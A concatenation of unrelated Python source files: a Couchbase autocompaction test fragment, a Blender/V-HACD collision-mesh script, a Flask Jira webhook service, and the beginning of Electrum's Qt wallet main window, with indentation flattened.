remote_client.execute_command("cd /opt/couchbase/var/lib/couchbase/data/default;rename .1 .65535 *.1")
remote_client.execute_command("cd /opt/couchbase/var/lib/couchbase/data/default;rename .2 .65535 *.2")
remote_client.start_couchbase()
for i in range(5):
self.log.info("starting a compaction iteration")
compaction_task = self.cluster.async_compact_bucket(self.master, self.default_bucket_name)
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name, timeout_in_seconds=self.wait_timeout)
res = compaction_task.result(self.wait_timeout)
if compact_run:
self.log.info("auto compaction run successfully")
else:
self.fail("auto compaction does not run")
remote_client.disconnect()
def test_start_stop_auto_DB_compaction(self):
threads = []
rest = RestConnection(self.master)
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value)
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
threads.append(Thread(target=self._monitor_DB_fragmentation, name="DB_Thread", args=()))
threads.append(Thread(target=self._cancel_bucket_compaction, name="cancel_Thread", args=(rest, self.default_bucket_name,)))
for thread in threads:
thread.start()
self.sleep(2)
for thread in threads:
thread.join()
if self.is_crashed.is_set():
self.fail("Error occurred during test run")
def _cancel_bucket_compaction(self, rest, bucket):
remote_client = RemoteMachineShellConnection(self.master)
try:
result = self.cluster.cancel_bucket_compaction(self.master, bucket)
self.assertTrue(result)
remote_client.wait_till_compaction_end(rest, self.default_bucket_name, self.wait_timeout)
compaction_running = False
except Exception as ex:
self.is_crashed.set()
self.log.error("Compaction cannot be cancelled: %s" % str(ex))
remote_client.disconnect()
def test_auto_compaction_with_multiple_buckets(self):
remote_client = RemoteMachineShellConnection(self.master)
rest = RestConnection(self.master)
for bucket in self.buckets:
if bucket.name == "default":
self.disable_compaction()
else:
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value, bucket=bucket.name)
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
end_time = time.time() + self.wait_timeout * 30
for bucket in self.buckets:
monitor_fragm = self.cluster.async_monitor_db_fragmentation(self.master, self.autocompaction_value, bucket.name)
while monitor_fragm.state != "FINISHED":
if end_time < time.time():
self.fail("Fragmentation level is not reached in %s sec" % self.wait_timeout * 30)
try:
self._load_all_buckets(self.servers[0], self.gen_update, "update", 0)
except Exception as ex:
self.log.error("Load cannot be performed: %s" % str(ex))
self.fail(ex)
monitor_fragm.result()
compact_run = remote_client.wait_till_compaction_end(rest, bucket.name,
timeout_in_seconds=(self.wait_timeout * 5))
if compact_run:
self.log.info("auto compaction run successfully")
remote_client.disconnect()
def _monitor_DB_fragmentation(self):
monitor_fragm = self.cluster.async_monitor_db_fragmentation(self.master, self.autocompaction_value, self.default_bucket_name)
end_time = time.time() + self.wait_timeout * 30
while monitor_fragm.state != "FINISHED":
if end_time < time.time():
self.fail("Fragmentation level is not reached in %s sec" % self.wait_timeout * 30)
try:
self._load_all_buckets(self.master, self.gen_update, "update", 0)
except Exception as ex:
self.is_crashed.set()
self.log.error("Load cannot be performed: %s" % str(ex))
self.fail(ex)
result = monitor_fragm.result()
if not result:
self.is_crashed.set()
self.assertTrue(result, "Fragmentation level is not reached")
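# Illustrative sketch only (not part of the test suite above): the autocompaction
# tests repeatedly poll an asynchronous fragmentation monitor while applying
# update load, and give up once a deadline passes. The helper below restates
# that pattern outside the framework; `monitor` and `apply_load` are
# hypothetical stand-ins, not Couchbase test-harness APIs.
def drive_until_finished(monitor, apply_load, timeout_seconds):
    deadline = time.time() + timeout_seconds
    while monitor.state != "FINISHED":
        if time.time() > deadline:
            raise TimeoutError("condition not reached in %s sec" % timeout_seconds)
        apply_load()
    return monitor.result()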
|
step_2_collision_mesh.py
|
import os
import subprocess
import argparse
import threading
NUM_THREADS = 32
parser = argparse.ArgumentParser('gen all vhacd')
parser.add_argument('--object_name', dest='object_name')
parser.add_argument('--input_dir', dest='input_dir')
parser.add_argument('--output_dir', dest='output_dir')
parser.add_argument('--split_loose', dest='split_merge',
action='store_true')
args = parser.parse_args()
if not os.path.isdir(args.input_dir):
raise ValueError('Input directory not found: {}'.format(args.input_dir))
os.makedirs(args.output_dir, exist_ok=True)
script_dir = os.path.dirname(os.path.abspath(__file__))
if args.split_merge:
tmp_dir = os.path.join(args.output_dir, 'tmp', 'split')
os.makedirs(tmp_dir, exist_ok=True)
########################
# split to loose parts #
########################
cmd = 'cd {} && blender -b --python step_2_split.py -- {} {}'.format(
script_dir, args.input_dir, tmp_dir)
subprocess.call(cmd, shell=True,
stdout=subprocess.DEVNULL)
input_dir = tmp_dir
else:
input_dir = args.input_dir
tmp_dir = os.path.join(args.output_dir, 'tmp', 'vhacd')
os.makedirs(tmp_dir, exist_ok=True)
objs = [o for o in os.listdir(input_dir) if os.path.splitext(o)[1] == '.obj']
print('Initiating V-HACD for {} meshes...'.format(len(objs)))
def vhacd(cmd):
subprocess.call(cmd, shell=True,
stdout=subprocess.DEVNULL)
threads = []
for o in objs:
in_f = os.path.join(input_dir, o)
out_f = os.path.join(tmp_dir, o)
cmd = '../../blender_utils/vhacd --input {} --output {}'.format(in_f, out_f)
thread = threading.Thread(target=vhacd, args=(cmd,))
thread.start()
threads.append(thread)
print('Waiting for V-HACD threads to finish...')
for thread in threads:
thread.join()
print('Merging V-HACD...')
###########################
# Merge all V-HACD to one #
###########################
cmd = 'cd {} && blender -b --python step_2_merge.py -- {} {} {}'.format(
script_dir, args.object_name, tmp_dir, args.output_dir)
subprocess.call(cmd, shell=True,
stdout=subprocess.DEVNULL)
tmp_dir = os.path.join(args.output_dir, 'tmp')
cmd = 'rm -r {}'.format(tmp_dir)
subprocess.call(cmd, shell=True)
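# Note that NUM_THREADS is declared at the top of this script but never used:
# the loop above starts one V-HACD thread per mesh with no upper bound. The
# helper below is an illustrative sketch (not wired into the pipeline) of how
# the constant could cap concurrency with a semaphore.
def run_bounded(commands, max_workers=NUM_THREADS):
    gate = threading.Semaphore(max_workers)

    def bounded_vhacd(c):
        # at most `max_workers` subprocesses run at any one time
        with gate:
            subprocess.call(c, shell=True, stdout=subprocess.DEVNULL)

    workers = [threading.Thread(target=bounded_vhacd, args=(c,)) for c in commands]
    for t in workers:
        t.start()
    for t in workers:
        t.join()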
|
app.py
|
import flask
import json
import queue
import threading
from jira.issues import issue_event
from jira.sprints import sprint_event, scheduler
app = flask.Flask(__name__)
q = queue.Queue()
def handle_webhook_from_q():
while True:
data = q.get()
if data == 'shutdown':
break
issue = data.get('issue')
if issue:
issue_event(issue)
sprint = data.get('sprint')
if sprint:
sprint_event(sprint)
threading.Thread(target=handle_webhook_from_q, daemon=True).start()
threading.Thread(target=scheduler, daemon=True).start()
@app.route('/', methods=['POST', 'GET'])
def webhook():
if flask.request.method == 'POST':
data = json.loads(flask.request.data.decode())
q.put(data)
return 'OK'
return 'JackBot is running!'
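# Illustrative sketch, not part of the running service: the route above enqueues
# the decoded JSON payload and the background worker drains the queue until it
# sees the 'shutdown' sentinel. A minimal local exercise of that flow could look
# like this (the name `_smoke_test` is hypothetical):
def _smoke_test():
    client = app.test_client()
    # an empty payload passes through the worker without triggering any handler
    resp = client.post('/', data=json.dumps({}))
    assert resp.data == b'OK'
    # ask the worker thread to exit cleanly
    q.put('shutdown')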
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from PyQt5.QtWidgets import *
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds, PrintError,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
traceback.print_exception(*exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
self.history_model.on_fee_histogram()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
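# fetch_alias above illustrates how this window runs slow lookups: do the
# blocking work on a daemon thread, store the result on the instance, and emit
# a Qt signal so the GUI thread consumes it safely. A stripped-down sketch of
# the same idea (illustrative only; `lookup`, `store_result` and `result_signal`
# are hypothetical names, not Electrum APIs):
#
#   def run_in_background(lookup, store_result, result_signal):
#       def f():
#           store_result(lookup())
#           result_signal.emit()
#       threading.Thread(target=f, daemon=True).start()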
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once the GUI has been initialized, check whether anything needs to be announced: the relevant callback may have fired before the GUI existed
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# "Settings"/"Preferences" are reserved menu item names on macOS, so a different label is used as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.print_error("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if is_relevant:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if is_relevant:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
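# notify_transactions above applies two policies before showing a popup: a
# 20-second rate limit keyed on the time of the last notification, and batching
# into a single summary message once three or more transactions are queued.
# The rate-limit check on its own reduces to (illustrative restatement only):
#
#   now = time.time()
#   if last_notification_time + rate_limit_seconds > now:
#       return   # too soon; leave the transactions queued for the next pass
#   last_notification_time = now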
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
